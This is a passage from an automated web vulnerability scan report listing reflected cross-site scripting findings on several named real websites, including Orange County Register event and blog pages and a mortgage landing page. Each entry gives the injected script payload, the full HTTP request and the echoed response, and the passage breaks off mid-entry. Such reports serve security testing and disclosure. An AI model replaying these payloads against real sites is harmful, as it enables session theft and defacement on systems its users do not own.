<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="svt" value="text66943"><script>alert(1)</script>2a358999d52" />
...[SNIP]...

1.129. http://events.ocregister.com/search [swhat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 365
ETag: "242db8931148a3dfc98ba516700c83a1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlZTc5OWMxOTJhNDhjYzU5ZjM4MDNkM2M5NTM4Y2JlNTEiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIwc3VwZXJib3dsMTFiZDUxMDwvc2NyaXB0PjxhIGI9Yz41MzVhNmVkNmYzOCIObGFzdF93aGVuIgAiC2J1Y2tldEYiDWxhc3RfcnNzIgAiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nIg5JcnZpbmUsQ0EiCnN0YXRlIgdDQQ%3D%3D--7e15617fc40bd48892f472ccad6abcf17f0e2f0e; path=/; expires=Tue, 03-May-2011 19:05:56 GMT; HttpOnly
Content-Length: 19242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
;
google_ad_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11bd510</script><a b=c>535a6ed6f38 Irvine,CA events";

//-->
...[SNIP]...

1.130. http://events.ocregister.com/search [swhat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 319
ETag: "904a9aaeecaa3760ec4ae913352ea43f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlZDAyNjcyNTliZDUyMTA5NTQ0YTQ3MmQxZWQzOTUyOWYiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCImc3VwZXJib3dsMTEzNjQ2OTxhIGI9Yz4yNzE5Y2JiNmFiIg5sYXN0X3doZW4iACILYnVja2V0RiINbGFzdF9yc3MiACINbG9jYXRpb257ECIJY2l0eSILSXJ2aW5lIgtyYWRpdXNpIyINbGF0aXR1ZGVmGjMzLjY3MTM5OTk5OTk5OTk5OABEZyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0lydmluZSwgQ0EiDXRpbWV6b25lIhhBbWVyaWNhL0xvc19BbmdlbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmEC0xMTcuNzkxAMi0IhF3aGVyZV9zdHJpbmciDklydmluZSxDQSIKc3RhdGUiB0NB--49479bafbda8b6a30f182d75b202be3c0913946a; path=/; expires=Tue, 03-May-2011 19:06:32 GMT; HttpOnly
Content-Length: 18888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
&amp;new=n&amp;search=true&amp;srad=30&amp;srss=&amp;st=any&amp;st_select=event&amp;svt=text&amp;swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&amp;swhen=&amp;swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a>
...[SNIP]...

1.131. http://events.ocregister.com/search [swhen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "9d9076ac94b1cfc6678e7c3e3c15d6e9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYmMyYWFhZWFhMzMxYWEzMmY0Mzc5ZTZjZTliNzcwMWIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIuODVkZjA8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BNDA0YTE5OTc1NzIiC2J1Y2tldEYiDWxhc3RfcnNzIgAiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nIg5JcnZpbmUsQ0EiCnN0YXRlIgdDQQ%3D%3D--2523d0baef5e6ef9f9771c16975a4313e2909934; path=/; expires=Tue, 03-May-2011 19:07:23 GMT; HttpOnly
Content-Length: 19667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

1.132. http://events.ocregister.com/search [swhere parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 1138
ETag: "468d769b70f16b15874182577d12a1ab"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNWQzNTk1YjIwZGEzOGQxYjAxZWY4MDYzOTdlZjU3NzUiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIqSXJ2aW5lLENBYTIxOGMiO2FsZXJ0KDEpLy8yNWZlYmU3ODQ1YSIKc3RhdGUiB0NB--42c543cfa16a16509c98ac9cf99589674206e7ce; path=/; expires=Tue, 03-May-2011 19:07:50 GMT; HttpOnly
Content-Length: 19341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
d_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CAa218c";alert(1)//25febe7845a events";

//-->
...[SNIP]...

1.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "461e66ba3abcf21317119f039b7ecc26"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNmQ4NmVkZjY4NmUzMjkwODEyN2E4MmI3ZDlkNDBlYWQiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--30890568bf662ec39e975be34aca81d31951bc89; path=/; expires=Tue, 03-May-2011 19:05:12 GMT; HttpOnly
Content-Length: 41476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" />
...[SNIP]...

1.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.orangecounty.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "8b8ae40e2ec1f011dfdb66c80bbcae14"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: zvents_tracker_sid=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMjUzNDE5NGU4ZmI2MDZlOWZlZGZjYzBlYzkzOGVhMjUiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaTciDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0234d99676f0e755442d2bdfa35eb38ed6b7ff6f; path=/; expires=Tue, 03-May-2011 19:05:13 GMT; HttpOnly
Content-Length: 74110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?fcc4c"><script>alert(1)</script>b1440f97378=1" />
...[SNIP]...

1.135. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" />
...[SNIP]...

1.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78253


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" />
...[SNIP]...

1.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ed"><script>alert(1)</script>27d26f5a006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scid=1794971&328ed"><script>alert(1)</script>27d26f5a006=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:14 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308111464447; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:06 GMT;path=/;httponly
Content-Length: 2952


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308111464447&rl_key=f5b32d99050a33d25f2b118f50fbe9bc&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&328ed"><script>alert(1)</script>27d26f5a006=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

1.138. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d57"><script>alert(1)</script>3b3d1a7631b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.139. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfc43'><script>alert(1)</script>24de61d88b7 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
